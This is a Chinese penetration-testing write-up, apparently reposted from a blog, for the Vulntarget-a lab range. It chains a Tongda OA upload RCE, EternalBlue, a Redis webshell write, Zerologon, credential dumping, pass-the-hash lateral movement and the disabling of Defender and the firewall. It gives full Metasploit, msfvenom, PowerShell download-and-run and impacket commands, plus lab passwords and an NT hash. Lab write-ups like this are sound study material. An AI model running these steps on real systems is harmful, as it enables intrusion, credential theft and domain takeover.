Vulntarget-a靶场实战记录

攻击手段

通达OA未授权上传+文件包含RCE

Redis未授权写马

ms17-010永恒之蓝

代理转发内网跳板

CVE-2020-1472 域控杀器Zerologon

wmiexec/smbexec横向移动

cobalt strike与msf的shell传递

网络环境

靶场地址:https://github.com/crow821/vulntarget

攻击机

kali ip:192.168.1.11

web服务器(WIN7)

内网ip:10.0.20.98

外网ip:192.168.1.7

win7/admin

Vulntarget-a靶场实战记录

域主机(WIN2016)

内网1:10.0.20.99

内网2:10.0.10.111

Administrator/Admin@123、vulntarget.com\win2016/Admin#123

Vulntarget-a靶场实战记录

域控(WIN2019)

内网2:10.0.10.110

administrator/Admin@666

Vulntarget-a靶场实战记录

信息收集

端口扫描

nmap -A -sV 192.168.1.7

Vulntarget-a靶场实战记录

访问80端口,发现是通达OA

Vulntarget-a靶场实战记录

同时经nmap探测看见了熟悉的445端口,并存在永恒之蓝漏洞。如果只扫了端口也可以msf常规探测一波

msfconsole

Vulntarget-a靶场实战记录

查询利用模块

search ms17_010

Vulntarget-a靶场实战记录
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.7
run

扫描出ms17-010永恒之蓝漏洞

Vulntarget-a靶场实战记录

漏洞利用

OA通达通用漏洞

永恒之蓝

利用这两个洞打一波

通达OA

去我搭建的Wiki文库看一下

Vulntarget-a靶场实战记录

存在的版本漏洞还是很多的

首先判断下通达OA的版本信息,有多个路径可以判断

http://192.168.1.7/inc/expired.php

http://192.168.1.7/inc/reg_trial.php

Vulntarget-a靶场实战记录

http://192.168.1.7/inc/reg_trial_submit.php

Vulntarget-a靶场实战记录

确定版本为11.3,可以利用未授权上传+文件包含RCE。

不想找了直接上脚本打。脚本在github上找的

获取cookie

Vulntarget-a靶场实战记录

一键利用

Vulntarget-a靶场实战记录

哥斯拉利用获得shell进行远控,得到的是system权限

Vulntarget-a靶场实战记录

永恒之蓝

因为之前探测到445端口确实存在永恒之蓝,msf利用 exploit/windows/smb/ms17_010_eternalblue直接打一下

use  exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.7
run

成功拿到meterpreter

Vulntarget-a靶场实战记录

顺便抓一波密码 Win7-PC 密码为admin

load kiwi
creds_all

Vulntarget-a靶场实战记录

上线CS

准备上线cs,启动cs server

./teamserver 192.168.1.11 123456

Vulntarget-a靶场实战记录

连一下

Vulntarget-a靶场实战记录

启动监听器

Vulntarget-a靶场实战记录

可以使用cs创建木马exe,放到目标机器执行。但鉴于已经拿到meterpreter,直接利用msf会话注入cs

后台当前session

background

加载msf的payload注入功能

use exploit/windows/local/payload_inject

设置payload

set payload windows/meterpreter/reverse_http

设置cs服务器地址端口

set LHOST 192.168.1.11
set LPORT 7777

设置监控会话

set session 1

设置当前msf不接受监听数据

set disablepayloadhander true
run

Vulntarget-a靶场实战记录

成功上线cs

Vulntarget-a靶场实战记录

接下来进入内网渗透环节

内网渗透

利用打下来的机子继续渗透

当前被控制下来的机子内网ip为10.0.20.98

Vulntarget-a靶场实战记录

扫描c段ip及重要端口

portscan 10.0.20.0-10.0.20.255 1-1024,3389,5000-6400 arp 1024

发现另一台内网主机ip,10.0.20.99并且开放端口6379、5985、80

Vulntarget-a靶场实战记录

构建通道

meterpreter掉线了,重新利用cs拿一下

启动Foreign HTTP监听器

Vulntarget-a靶场实战记录

msf监听

use exploit/multi/handler
set lhost 0.0.0.0
set lport 5555
set payload windows/meterpreter/reverse_http

控制机右键spawn

Vulntarget-a靶场实战记录

选择msf

Vulntarget-a靶场实战记录

msf重新获得meterpreter

之后添加路由

run autoroute -s 10.0.20.0/24

Vulntarget-a靶场实战记录

我们现在无法直接访问内网,但win7的内网主机已经上线,可以进行代理转发将win7作为跳板机直接访问内网。

配置socks代理

Vulntarget-a靶场实战记录

端口8888

Vulntarget-a靶场实战记录

Vulntarget-a靶场实战记录

攻击机kali利用proxychains 配合Socks代理通信

vim /etc/proxychains4.conf

底部添加

socks4 127.0.0.1 8888

Vulntarget-a靶场实战记录

测试下代理转发是否生效,nmap 走 Socks 代理

proxychains nmap -Pn -sT -p6379 10.0.20.99

Vulntarget-a靶场实战记录

记得除了6379还有80端口

浏览器开代理进行访问,Type类型修改为SOCKS4

Vulntarget-a靶场实战记录

开启代理后直接访问10.0.20.99的80端口,看看有什么东西,然而啥都没有

Vulntarget-a靶场实战记录

fuzz下目录看看有什么东西,是真的乱

proxychains python dirsearch.py -u http://10.0.20.99 -i 200

Vulntarget-a靶场实战记录

不用proxychains了直接代理

python dirsearch.py -u "http://10.0.20.99/" --proxy=socks4://127.0.0.1:8888

Vulntarget-a靶场实战记录

扫到php文件

l.php

Vulntarget-a靶场实战记录

phpinfo.php

Vulntarget-a靶场实战记录

都是一些配置信息,可能后面会有用

先看6379的Redis端口是不是未授权

proxychains redis-cli -h 10.0.20.99

Vulntarget-a靶场实战记录

还真的是,直接写入webshell,因为这个服务器同时开启了http就不用写反弹shell了

主要就是找到路径,而路径在l.php已经给了…

Vulntarget-a靶场实战记录
config set dir "C:/phpStudy/PHPTutorial/www/"
config set dbfilename shell.php
set x ""
save

直接远控试一下,哥斯拉没连成直接上蚁剑,需要先开启代理

Vulntarget-a靶场实战记录

连接成功

Vulntarget-a靶场实战记录

查看权限

Vulntarget-a靶场实战记录

信息收集一波

quser

Vulntarget-a靶场实战记录

发现win2016用户在线

ipconifg /all

发现域名vulntarget.com以及另一个内网ip:10.0.10.111

Vulntarget-a靶场实战记录

查看进程

tasklist

获得结果

System Idle Process              0 Services                   0          4 K
System                           4 Services                   0        140 K
smss.exe                       260 Services                   0      1,192 K
csrss.exe                      372 Services                   0      4,452 K
csrss.exe                      468 Console                    1      4,080 K
wininit.exe                    488 Services                   0      5,044 K
winlogon.exe                   524 Console                    1     14,912 K
services.exe                   596 Services                   0      7,088 K
lsass.exe                      612 Services                   0     15,796 K
svchost.exe                    688 Services                   0     19,204 K
svchost.exe                    744 Services                   0     10,076 K
svchost.exe                    848 Services                   0     47,292 K
dwm.exe                        908 Console                    1     59,552 K
svchost.exe                    932 Services                   0     21,068 K
svchost.exe                   1008 Services                   0     22,648 K
svchost.exe                   1016 Services                   0     22,028 K
svchost.exe                    464 Services                   0     18,336 K
svchost.exe                   1036 Services                   0     21,180 K
svchost.exe                   1128 Services                   0      7,080 K
spoolsv.exe                   1644 Services                   0     15,292 K
svchost.exe                   1776 Services                   0     16,148 K
svchost.exe                   1840 Services                   0      8,000 K
svchost.exe                   1864 Services                   0     20,456 K
vm3dservice.exe               1928 Services                   0      6,028 K
vmtoolsd.exe                  1948 Services                   0     20,920 K
httpd.exe                     1964 Services                   0     15,376 K
MsMpEng.exe                   2000 Services                   0     86,692 K
vm3dservice.exe               1772 Console                    1      6,936 K
redis-server.exe              1564 Services                   0     26,208 K
VGAuthService.exe             1556 Services                   0     10,364 K
svchost.exe                   2164 Services                   0      6,820 K
dllhost.exe                   2592 Services                   0     12,376 K
msdtc.exe                     2700 Services                   0      9,820 K
httpd.exe                     3024 Services                   0     54,104 K
WmiPrvSE.exe                  3736 Services                   0     31,684 K
WmiPrvSE.exe                  3744 Services                   0     19,460 K
RuntimeBroker.exe             3908 Console                    1     26,352 K
sihost.exe                    3972 Console                    1     18,644 K
svchost.exe                   4008 Console                    1     19,796 K
taskhostw.exe                 4028 Console                    1     14,432 K
ChsIME.exe                     660 Console                    1     15,148 K
explorer.exe                  1140 Console                    1     61,068 K
ShellExperienceHost.exe       4540 Console                    1     57,132 K
SearchUI.exe                  4688 Console                    1     43,848 K
ServerManager.exe             5096 Console                    1    172,844 K
vmtoolsd.exe                  4672 Console                    1     33,176 K
LogonUI.exe                   5164 Console                    1     36,616 K
ChsIME.exe                    5076 Console                    1      7,844 K
LockAppHost.exe               4504 Console                    1     42,808 K
LockApp.exe                   5540 Console                    1     40,016 K
MpCmdRun.exe                  3792 Services                   0      8,184 K
WmiPrvSE.exe                  4736 Services                   0      9,040 K
WmiPrvSE.exe                  4172 Services                   0     13,288 K
cmd.exe                       4476 Services                   0      3,584 K
conhost.exe                   5512 Services                   0      5,484 K
cmd.exe                       5452 Services                   0      3,564 K
tasklist.exe                  5868 Services                   0      7,904 K

将结果复制到蚁剑插件看看有没有杀软,识别出开启了Windows Defender

Vulntarget-a靶场实战记录

尝试上传木马一直被杀

除了Windows Defender还开了防火墙,把这俩玩意关了

关Windows Defender

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

gpupdate /force

关防火墙

netsh advfirewall show allprofiles # 查看防火墙配置
netSh advfirewall set allprofiles state off # 关闭防火墙

生成木马,上传

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8881 -f exe -o fxx.exe

Vulntarget-a靶场实战记录

由于这个是正向的webshell,msf需要监听的ip是内网的ip

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
set lport 8881

但不知道为何msf死活不上线,后面用了proxychains启动msf执行这流程成功获得了meterpreter

proxychains msfconsole

Vulntarget-a靶场实战记录

之后直接上线cs吧,启动tcp监听器

Vulntarget-a靶场实战记录

生成后门

Vulntarget-a靶场实战记录

Win2016 10.0.20.99上传后门并运行

通过Win7 10.0.20.98监听 成功上线

connect 10.0.20.99 5557

Vulntarget-a靶场实战记录

域渗透

目前就差个DC域控就打穿了

还是信息收集先找到域控

查看当前时间,通常情况时间服务器都是主域控。

net time /domain

Vulntarget-a靶场实战记录

拿到域名,直接ping得到ip 10.0.10.110

Vulntarget-a靶场实战记录

查找域控计算机名 WIN2019

net group "domain controllers" /domain

Vulntarget-a靶场实战记录

接着拿域控大杀器Zerologon漏洞打一下(CVE-2020-1472)

攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。

影响版本如下

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

因为这里用Win7的机器直接ping不通DC,Win2016有10.0.10.111和域控在同一C段可以ping通域控,还需要添加新的10.0.10.0/24的路由,因为已经上线了msf,直接添加

run autoroute -s 10.0.10.0/24

Vulntarget-a靶场实战记录

cs设置代理转发端口

Vulntarget-a靶场实战记录
vim /etc/proxychains4.conf

添加,同时需要将之前的8888代理转发先注释掉

socks4  127.0.0.1 8887

Vulntarget-a靶场实战记录

之后我们的CVE-2020-1472验证脚本才能成功运行,验证出确实存在Zerologon的漏洞

proxychains python3 zerologon_tester.py WIN2019 10.0.10.110

GitHub – SecuraBV/CVE-2020-1472: Test tool for CVE-2020-1472

Vulntarget-a靶场实战记录

利用exp打一波

https://github.com/dirkjanm/CVE-2020-1472

先将密码置空

proxychains python cve-2020-1472-exploit.py WIN2019 10.0.10.110

python安装impacket包,并利用examples目录下的exp获取hash

python3 secretsdump.py 域名称/域控主机名$@域控IP -no-pass

proxychains python3 secretsdump.py vulntarget/win2019\$@10.0.10.110 -no-pass

Vulntarget-a靶场实战记录

成功得到域管administrator的hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

利用smbexex.py 或 wmiexec.py横向移动,拿下域控

proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15
administrator@10.0.10.110

Vulntarget-a靶场实战记录
proxychains python3 wmiexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15
vulntarget/administrator@10.0.10.110

Vulntarget-a靶场实战记录

拿下域控接下来 上线msf

先把域控防火墙关了

netsh advfirewall show allprofiles # 查看防火墙配置
netSh advfirewall set allprofiles state off # 关闭防火墙

或者添加防火墙规则

netsh advfirewall firewall add rule name="bind_fuxx" protocol=TCP dir=in localport=8886 action=allow

生成正向后门

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8886 -f exe -o 8886bind.exe

因为10.0.20.99开启了80端口有Web服务,可以先传到这台机子上方便域控下载后门

传完进行下载

powershell (new-object
System.Net.WebClient).DownloadFile('http://10.0.10.111/8886bind.exe','c:\tp.exe')

msf启动还是得利用win2016作为跳板机代理转发

proxychains msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8886
set rhost 10.0.10.110

Vulntarget-a靶场实战记录

上线cs

Vulntarget-a靶场实战记录

生成后门

Vulntarget-a靶场实战记录

上传10.0.20.99

执行

powershell (new-object
System.Net.WebClient).DownloadFile('http://10.0.10.111/tcp_5998.exe','c:\ketty.exe')
ketty.exe

cs正向连接

connect 10.0.10.110 5998

Vulntarget-a靶场实战记录

成功打穿

Vulntarget-a靶场实战记录

远控

域控如果是弱口令的话可以进行爆破

john --wordlist=password.txt dchash.txt --format=NT

Vulntarget-a靶场实战记录

得到域控密码为Admin@666

开启3389端口

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

防火墙放行3389(或关闭防火墙)连接

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

成功远控DC

Vulntarget-a靶场实战记录

Original: https://blog.csdn.net/qq_18980147/article/details/127795827
Author: tpaer
Title: Vulntarget-a靶场实战记录

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/654264/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

  • FPGA图像处理_OTSU算法的实现(含源码)

    由于图像阈值的直观性和易于实现的性质,使它在图像分割应用中处于中心地位。阈值分割方法实际上是输入图像f f f到输出图像g g g的变换,如式所示。g ( i , j ) = { …

    人工智能 2023年6月18日
    0158
  • Pytorch环境搭建

    1.创建环境 首先打开Anaconda 命令提示行,即打开Anaconda Prompt,前面显示(base)说明已经进入Anaconda的基础环境,然后我们键入 conda cr…

    人工智能 2023年7月4日
    071
  • 扩散模型又杀疯了!这一次被攻占的领域是…

    文 | Yimin_饭煲 从2020年的初出茅庐,到2021年的日趋火热,再到2022年的大放异彩, 扩散模型(Diffusion Models) 正在人工智能学术界和工业界获取越…

    人工智能 2023年5月27日
    068
  • 关于yolov5的一些说明(txt文件、训练结果分析等)

    一、yolo中txt文件的说明: 二、yolo跑视频、图片文件的格式: 三、yolov5训练结果不好的原因: 1. 欠拟合: 在训练集上表现很差,测试集上表现也很差的现象可能是欠拟…

    人工智能 2023年7月29日
    058
  • pytorch:concat和stack的区别

    整体来讲,concat是对dim进行拼接,stack是对dim维进行堆叠。concat:不会增加新的维度,在指定维度上拼接。stack:增加一个新的维度将两个单位,然后再上一维度分…

    人工智能 2023年6月17日
    080
  • 2022年终考核经验教训

    啊哦~你想找的内容离你而去了哦 内容不存在,可能为如下原因导致: ① 内容还在审核中 ② 内容以前存在,但是由于不符合新 的规定而被删除 ③ 内容地址错误 ④ 作者删除了内容。 可…

    人工智能 2023年7月31日
    056
  • MachineLearning入门—第2章—神经网络的数学基础

    神经网络的数学基础神经网络的核心组件是层(layer),它是一种数据处理模块,可以看作是数据过滤器,进去一些数据,出来的数据变得更加有用。 大多数深度学习都是将简单的层链接起来,从…

    人工智能 2023年7月18日
    056
  • 数据分析的重要性

    — 总结自一个课程一.为什么数据分析重要在实际工作中无论是专业的数据分析岗位,还是运营、产品等岗位都开始关注从业者的数据分析能力,运营需要通过数据分析来解决流量、用户增长问题;产品…

    人工智能 2023年7月17日
    067
  • Python基础练习题,含答案解析

    大家好,我是辣条。 今天给大家整理一些Python练习题【含答案解析】,可以自己先尝试做一下,再和文末的答案解析核对,希望能帮助到你。 练习题 1.使用字符串的格式化输出完成以下名…

    人工智能 2023年7月5日
    0113
  • 如何在linux上直接运行python程序(感谢亮赶同学)

    如何在linux上直接运行python程序(感谢亮赶同学) ==最后感谢亮赶同学的帮助== 之前亮赶同学在我的服务器上一顿操作,给我把数据路径问题解决了,随后拂袖而去,这让身为小白…

    人工智能 2023年7月5日
    071
  • 图神经网络在推荐系统中的应用

    互联网中到处都是图结构的数据,比如我们熟悉的社交网络,最近流行的知识图谱等等,这些数据中包含着大量的关系信息,这对推荐系统来说是非常有帮助的。为了能更好地利用这些信息进行推荐,各大…

    人工智能 2023年6月1日
    0105
  • 深度强化学习-TD3算法原理与代码

    深度强化学习-TD3算法原理与代码 引言 1 TD3算法简介 2 TD3算法原理 2.1 双重网络 2.1.1 网络过估计的成因 2.1.2 双重网络的引入 2.2 目标策略平滑正…

    人工智能 2023年6月16日
    067
  • Git三剑客之基础部分

    本篇文章基于极客时间中苏玲老师的《玩转git三剑客》完成 课程资料:https://gitee.com/geekbang-courseware/Git-Learning 一、Git…

    人工智能 2023年6月27日
    084
  • Leetcode1704:判断字符串的两半是否相似

    给你一个偶数长度的字符串 s 。将其拆分成长度相同的两半,前一半为 a ,后一半为 b 。 两个字符串 相似 的前提是它们都含有相同数目的元音(’a’,&#…

    人工智能 2023年6月29日
    045
  • keras和tensorflow的版本对应关系

    keras和tensorflow的版本对应关系 FrameworkEnv name (–env parameter)DescriptionDocker Image Packages…

    人工智能 2023年5月23日
    0125
  • 深度学习基础及实现的必备步骤

    为什么要以均方误差作为损失函数?(将模型在每个训练样本上的预测误差加和,来衡量整体样本的准确性) 解:利用均方误差画出来的图像有如下特点 曲线的最低点是可导的。 越接近最低点,曲线…

    人工智能 2023年6月25日
    087
亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球